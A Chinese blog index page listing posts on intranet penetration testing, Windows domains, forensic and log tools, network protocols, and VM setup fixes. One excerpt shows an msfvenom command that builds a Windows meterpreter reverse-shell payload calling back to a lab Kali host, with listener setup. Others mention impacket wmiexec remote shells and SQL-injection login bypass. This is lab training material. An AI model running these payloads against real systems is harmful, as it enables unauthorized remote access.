- 博客(40)
- 收藏
- 关注
RSS订阅原创 内网渗透测试——内网渗透测试基础
1.内网基础知识1.域得划再局域网中将不同的计算机按照功能(或部门)分别列入不同的工作组。加入创建工作组:点击桌面上的计算机图标,再弹出的快捷键菜单中选择属性,然后几次点击更改设置和更改按钮。再计算机名输入框输入计算机的名称,再工作组输入框输入想要加入的工作组名称。2.域域:是一个有安全边界的计算机集合(安全是指在两个域中,一个域的用户无法访问另一个域中的资源)域控制器(DC):是域中的一台类似管理服务器的计算机。负责所有连入的计算机和用户的验证工作。域控制器中存在由这个域的账户,密码,属于
2023-01-04 14:30:02
1003
原创 内网渗透测试——搭建域环境
1.Windows域介绍域是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后,两个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫,称为“域控制器(Domain Controller,简写为DC)”。域控制器中包含了由这个域的账户、密码
2023-01-04 14:18:58
1170
1
原创 Process Hacker工具使用
Process Hacker是一款免费开源的统进程管理和内存编辑器,它不仅能够帮助你查看管理进程,同时也能进行系统监视和内存编辑,帮助你监视系统资源、调试软件和检测恶意软件。下载地址:https://process-hacker.en.softonic.com/使用直接双击Process Hacker.exe简单使用1.监控流量首先可以监测软件的流量2.管理服务,包含检测系统加载的驱动3.查看软件的网络连接4.检测磁盘读写数据,有部分软件疯狂的读写磁盘,磁盘损耗,浪费带宽。5.F
2022-05-26 10:58:44
10216
原创 linux日志分析
https://blog.csdn.net/lza20001103/article/details/124637558?spm=1001.2014.3001.5502
2022-05-25 21:12:17
1174
原创 windows日志分析-Log Parser等工具使用
Windows 主要有以下三类日志记录系统事件:应用程序日志、系统日志和安全日志系统日志:%SystemRoot%\System32\Winevt\Logs\System.evtx记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。应用程序日志:%SystemRoot%\System32\Winevt\Logs\Application.evtx包含由应用程序或系统程序记录的事件,主要记录程序运行程序方面的事件。安全日志:%SystemRoot%\Syste
2022-05-24 13:29:22
9390
原创 TCPView的使用教程
TCPView是一个查看端口和线程的小工具,只要木马在内存中运行,一定会打开某个端口,只要黑客进入你的电脑,就有新的线程,tcpview虽然是静态表示端口和线程的,但是它方便,占用资源少!1.下载地址https://docs.microsoft.com/zh-cn/sysinternals/downloads/tcpview2.使用该软件是绿色软件不需要安装,下载完直接双击即可运行,主界面中显示了当前计算机打开的端口和线程。上面从左到右依次是Process Name 连接的进程名连接进程的
2022-05-24 10:07:18
1749
原创 浏览器信息分析:browserhistoryview或iecookies view
browserhistoryviewbrowserhistoryview是查看浏览器浏览记录的工具,支持了IE、Firefox、Chrome及Safari等多个浏览器,能将结果保存成多种格式。1.下载BrowsingHistoryView之后,运行里面的BrowsingHistoryView.exe即可,无须安装。打开之后选择一些选项这个可以自己根据时间选择。(选项-高级选项可以调出来)Ctrl + F来搜索浏览历史,可输入网址或网页标题其中的关键字,就可立刻帮你找出该网址。鼠标右键,可保
2022-05-24 09:41:09
927
原创 MSF生成shell连接win2012
实验环境kali:192.168.98.168win2012:192.168.98.167生成木马msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.98.168(kali ip) LPORT=777 -f exe > shell.exe #生成的文件上传到目标机器并执行设置监听use exploit/multi/handler #创建监听set payload windows/x64/meterpr
2022-05-07 16:11:14
841
2
原创 Sqli-labs通关手册【1-30关】
1.sql注入的原理1)sql注入的原因语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后在运行时直接由使用该语言的计算机执行这些指令。例如:在与用户交互的程序中,用户的输入拼接到SQL语句中,执行了与原定计划不同的行为,从而产生了SQL注入漏洞。2)登录案例讲解主要是万能密码:登录SQL语句:select * from admin where username = ‘用户输入的用户名’
2022-05-03 21:28:00
7270
原创 修改SLmail邮件服务器IP地址
安装SLMail 5.5.0 Mail Server我选择得IP地址是169.254.153.57后来我更新了IP地址,不在适配所以要更改成本地IP地址首先打开注册表编辑点击运行输入“regedit”按如图搜索右键修改修改完成后,先关机重启查看是否修改成功netstat -anook 修改成功...
2022-04-19 12:41:25
517
原创 VMware虚拟机增加硬盘(存储空间)
关闭虚拟机等待完成进入虚拟机,右键点击我的电脑(计算机)点击“管理”,打开计算机管理界面。点击“存储”—“磁盘管理”,这里可以看到我刚才新增得4G磁盘空间没用指派这里可以分配给已有得磁盘,也可以新建一个磁盘...
2022-04-19 09:36:13
2752
原创 kali下载impacket
需要python3的环境git clone https://github.com/CoreSecurity/impacket.gitcd impacket/python3 -m pip install . python3 setup.py installwmiexec.py:半交互式 shell,通过 Windows Management Instrumentation 使用。它不需要在目标服务器上安装任何服务/代理。以管理员身份运行。高度隐蔽。wmiexec.py Administrato
2022-04-16 15:50:33
4260
原创 kali切换python版本
打开终端分别输入下面两条命令update-alternatives --install /usr/bin/python python /usr/bin/python2 100update-alternatives --install /usr/bin/python python /usr/bin/python3 150输入python --version查看版本切换python版本update-alternatives --config python 然后选你需要的python版本
2022-04-16 15:36:27
2566
原创 Type `help` to learn how to use Xshell pormpt.
刚下载的centos7与xshell连接报错出现:Type help to learn how to use Xshell pormpt.解决报错方法选择VMware编辑里面的虚拟编辑网络选择更改设置赋予管理员权限进入网卡配置文件,发现我的BOOTPROTO=no,然后我把这项修改为BOOTPROTO=dhcp/etc/sysconfig/network-scrips/ifcfg-eno0然后输入链接靶机的用户名和密码就行了...
2022-04-07 16:29:47
13431
原创 VirtualBox中虚拟机IP地址相同
近期再VirtualBox中做实验,安装两个虚拟机发现IP地址相同。网络选择都是nat模式在VirtualBox控制面板中,转到“文件”->“首选项”->“网络”选择NAT网络选项卡,通过单击侧面的+按钮创建一个新的“ NatNetwork”,然后按OK。现在选择每个虚拟机,进入设置->网络在“附加到:”选项中,选择“ NAT网络”,然后选择“ NatNetwork”,然后按OK。重新启动所有虚拟机。现在,VM具有不同的网络地址。https://blog.csdn.ne
2022-04-05 12:52:25
8005
2
原创 windows 2012安装python2
首先python2和python3版本是不兼容的,所有不能同时安装,本次因为做实验需要python2的环境1.下载安装包下载地址:https://www.python.org/2.安装这里第一步我本来想创建一个文件夹的,但是发现他自己创建了,反正是虚拟机随便造直接无线下一步就可3.设置系统环境变量不能直接使用,所有需要配置环境变量点击这台电脑—》右键—》属性复制你安装过程中python27这个路径:C:\Python27这里注意要加上英文**;**执行成功.
2022-04-04 16:27:25
1675
原创 网络协议底层原理8——HTTPandHTTPS
1.HTTP1.HTTP/1.1协议的不足同一时间,一个连接只能对应一个请求:针对同一个域名,大多数浏览器允许同时最多6个并发连接只允许客户端主动发起请求:一个请求只能对应一个响应同一个会话的多次请求中,头信息会被重复传输:通常会给每个传输增加 500~800 字节的开销,如果使用 Cookie,增加的开销有时会达到上千字节2.HTTP/2HTTP/2在底层传输做了很多的改进和优化,但在语意上完全与 HTTP/1.1 兼容:比如请求方法(如GET、POST)、Status Code、各种Hea
2022-04-04 10:21:16
206
原创 网络协议底层原理7——网络安全
网络通信中面临的4种安全威胁:截获:窃听通信内容中断:中断网络通信篡改:篡改通信内容伪造:伪造通信内容1.网络层 - ARP欺骗ARP欺骗 (ARP spoofing),又称ARP毒化 (ARP poisoning)、ARP病毒、ARP攻击ARP欺骗可以造成的效果可让攻击者获取局域网上的数据包甚至可篡改数据包可让网络上特定电脑之间无法正常通信(例如网络执法官这样的软件)让送至特定IP地址的流量被错误送到攻击者所取代的地方ARP欺骗防护:静态ARPDHCP Snooping网络设
2022-04-04 10:19:51
320
原创 网络协议底层原理6——应用层
1.应用层的常见协议超文本传输:HTTP、HTTPS文件传输:FTP电子邮件:SMTP、POP3、IMAP动态主机配置:DHCP域名系统:DNS2.域名( Domain Name)- 顶级域名、二级域名由于IP地址不方便记忆,并且不能表达组织的名称和性质,人们设计出了 域名(比如baidu.com)但实际上,为了能够访问到具体的主机,最终还是得知道目标主机的IP地址域名申请注册:域名申请注册1.顶级域名的分类通用顶级域名(General Top-level Domain,简称 gTLD
2022-04-04 10:14:47
779
原创 网络协议底层原理5——传输层
1.传输层( Transport)传输层有2个协议:TCP(Transmission Control Protocol),传输控制协议UDP(User Datagram Protocol),用户数据报协议1.UDP 协议(数据格式、检验和)1.UDP-数据格式UDP是无连接的,减少了建立和释放连接的开销UDP尽最大能力交付,不保证可靠交付因此不需要维护一些复杂的参数,首部只有8个字节(TCP的首部至少20个字节)UDP长度(Length)占16位:首部的长度 + 数据的长度2.检验和(
2022-04-04 10:03:20
449
原创 windows2012开启ftp服务
ftp: Can’t connect to `192.168.98.167:21’: 拒绝连接在我准备连接win2012的ftp时,发现拒绝连接,默认是关闭的需要开启1.配置FTP服务器打开服务器管理器,选择添加功能和角色选择服务器勾选FTP服务器选项完成安装2.添加FTP站点服务器管理器工具中打开IIS 管理器选择网站选项,点击右侧的 添加 FTP 站点填写站点名称和物理路径,物理路径即FTP上传下载文件的保存目录按照下图进行配置,端口号默认21按图配置,点击完成
2022-04-03 17:05:48
3298
原创 centos7开启ssh 22端口
查看是否安装sshrpm -qa | grep sshyum install openssh-server 安装ssh开启sshservice sshd startnetstat -ntpl | grep 22 查看端口是否打开测试连接ssh root@192.168.98.128(centos7IP)
2022-04-03 11:03:27
13510
原创 windows2012 下载启动ssh
1.下载安装openssh下载地址:https://github.com/PowerShell/Win32-OpenSSH/releases2、下载解压,修改文件名为openssh然后拷贝文件到C盘目录下2.启动ssh服务(记得关闭防火墙)以管理员身份进入cmd进入ssh目录启动安装SSH服务powershell.exe -ExecutionPolicy Bypass -File install-sshd.ps1在防火墙开启端口22端口号netsh advfirewall firewa
2022-04-03 10:48:33
2044
原创 kali启动ssh服务
kali默认是没用开启ssh服务的,需要手动开启方法一systemctl status sshsystemctl start ssh 启用 SSH 服务systemctl status ssh 查看服务是否成功启用:sudo systemctl enable ssh 可以设置 SSH 服务开机自启动方法二这需要root用户权限vi /etc/ssh/sshd_config 编辑配置文件将参数 PermitRootLogin 设为 yessystemctl start ssh
2022-04-02 15:04:55
5274
原创 新安装的kali-linux 2022.1无法与其他虚拟机之间互相ping同
新安装了kali然后发现虚拟机无法与其他虚拟机互相ping同也无法被ping首先虚拟机之间都是nat模式所有此时要查看不能ping同的虚拟机之间是否在同一个网段此时要查看你的主机中网络连接的VMnet8的网段(VMnet8为nat模式)查看发现所有要更改成相同的网段此时在测试虚拟机相互之间可以ping同...
2022-04-02 13:01:37
8774
1
原创 解决windows server 2012无法正常上网
1.打开Internet Explorer(IE浏览器)2.选择右上角的设置,弹出的菜单中选择【Internet选项】3.选择安全,其中安全等级中会设置为【高安全性】一些设置就是如此得,不需要更改4.选择服务器图标,点击【本地服务器】5.在属性面板中,点击IE增强的安全配置后的启用6.分别勾选管理员和用户的关闭7.重启浏览器后,输入www.baidu.com,即可以正常上网...
2022-03-30 21:15:11
14867
原创 kali linux无法ping同刚安装得windows server 2012
在安装windows server 2012完成之后,都在NAT模式下,win2012可以ping同kali linux,但是kali Linux确无法ping同win2012解决方法打开文件资源管理器,右击网络上方会出现“网络发现和文件共享已关闭,看不懂网络计算机和设备,单及已更改”单机选择你想启用所有公用网络得网络发现和文件共享吗?双击:是…发现可以ping同...
2022-03-30 20:57:48
458
原创 网络协议底层原理4——网络层
网络层网络层数据包(IP数据包,Packet)由首部、数据2部分组成数据:很多时候是由传输层传递下来的数据段(Segment)
2022-03-30 08:31:38
836
原创 网络协议底层原理3——数据链路层
数据链路层(Data Link)链路:从1个节点到相邻节点的一段物理线路(有线或无线),中间没有其他交换节点数据链路:在一条链路上传输数据时,需要有对应的通信协议来控制数据的传输;不同类型的数据链路,所用的通信协议可能是不同的广播信道:CSMA/CD协议(比如同轴电缆、集线器等组成的网络)点对点信道:PPP协议(比如2个路由器之间的信道)数据链路层的3个基本问题(任何链路都需要)封装成帧透明传输差错检验1.封装成帧帧(Frame)的数据部分:就是网络层传递下来的 数据包(IP数据包,
2022-03-29 21:41:41
264
原创 Errors during downloading metadata for repository ‘AppStream‘: - Status code: 404 for http://mirro
centos8.0以上版本安装宝塔面板失败是因为yum源的问题,所有需要换源# 进入yum目录cd /etc/yum.repos.d# 删除目录下所有文件rm -rf ./*# 安装正确的源wget -O /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-vault-8.5.2111.repo# 生成缓存yum makecache然后进行宝塔安装就可了...
2022-03-27 10:06:40
296
原创 linux下的cc/gcc命令
linux系统的C编译器为gcc,它是GNU推出的功能强大的编译工具,因为UNIX系统的编译器为cc,所以在Linux系统还保留一个链接cc,用于和UNIX的向后兼容。其中g++和c++与gcc和cc的使用参数大致相同gcc/cc常用命令-o:指定生成的输出文件; -E:仅执行编译预处理; -S:将C代码转换为汇编代码;-wall:显示警告信息; -c:仅执行编译操作,不进行连接操作。-O:使用编译优化级别1编译程序。级别为1~3,级别越大优化效果越好,但编译时间越长。1 假设源程序
2022-03-19 11:33:37
5764
原创 mysql5.5忘记密码——修改密码
ERROR 1045 (28000): Access denied for user ‘root’@‘localhost’ (using password: YES)1.进入mysql的bin目录2.net stop mysql关闭Mysql服务记住这一步要在管理员模式下执行net stop mysql3.mysqld --skip-grant-tablesskip-grant-tables 的意思是启动 MySQL 服务的时候跳过权限表认证注意:这时候,刚刚打开的 cmd 窗口已经不
2022-03-08 20:18:03
7944
3
原创 Kali Linux 2022修改Root用户密码(VirtualBox)
1.启动Kali Liunx 进入开机启动页面,按键盘e键进入Kali GNU GRUB页面2.进入Kali GNU GRUB页面3.在Kali GNU GRUB页面,选择linux那一行,将ro 改为 rw 在此行末尾增加 init=/bin/bash 修改完毕以后按Ctrl+X 键进入单用户模式4.按Ctrl + X进入单用户模式命令行界面5.执行passwd命令重置root账号密码,请连续输入两次密码~密码是密文的,直接如即可,输入完自己设置的密码以后会提示密码更新成功6.重启,真
2022-02-23 22:25:51
4726
5
原创 网络协议底层原理——基础知识
1.基础知识1)说明是互联网数据是通过网络协议从一个设备传递到另一个设备的2)客户端与服务端之间的联系客户端向服务器发出请求服务器收到请求向客户端发出响应3)网络互联模型OSI参考模型(7层)比较偏向于理论知识,,TCP/IP(4层)是我们在实际中使用的协议,为了方便学习计算机网络,又常将其划分为五层4)数据传输过程数据传输时会由应用层逐步向下传递,向下时每层会添加自己标识,到最底层时就将数据发送到线路中,然后路由器会根据包的目的之地将数据送到目标地址,一步一步去掉每层的标识,最终获取
2022-02-22 14:41:41
2050
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人